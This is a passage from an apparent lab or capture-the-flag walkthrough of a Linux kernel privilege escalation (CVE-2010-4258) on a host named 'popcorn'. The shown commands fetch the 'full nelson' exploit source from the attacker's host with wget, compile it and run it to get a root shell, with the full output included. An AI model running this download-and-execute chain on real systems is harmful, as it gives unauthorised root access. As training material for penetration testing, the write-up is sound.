PEAS has discovered that the target system is vulnerable to CVE-2010-4258
CVE-2010-4258
a vulnerability discovered in linux kernel 2.6.16.9 ( Operating System ). Function is affected do_exit. The manipulation with an unknown input leads to a privilege escalation vulnerability. This affects confidentiality, consistency and availability.
exploit (full nelson)
Exploit was found online.
I will get the x86 version of the exploit
Exploitation
www-data@popcorn:/dev/shm$ wget http://10.10.14.5:8000/CVE-2010-4258/full-nelson.c
--2023-02-02 14:30:38-- http://10.10.14.5:8000/CVE-2010-4258/full-nelson.c
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 9124 (8.9K) [text/x-csrc]
saving to: `full-nelson.c'
100%[======================================>] 9,124 --.-K/s in 0.04s
2023-02-02 14:30:39 (248 KB/s) - `full-nelson.c' saved [9124/9124]Delivery complete
www-data@popcorn:/dev/shm$ gcc full-nelson.c -o full-nelsonCompile
www-data@popcorn:/dev/shm$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf845e280
[+] Resolved econet_ops to 0xf845e360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
popcorn
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:50:56:b9:f3:bb brd ff:ff:ff:ff:ff:ff
inet 10.10.10.6/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:feb9:f3bb/64 scope global dynamic
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:f3bb/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise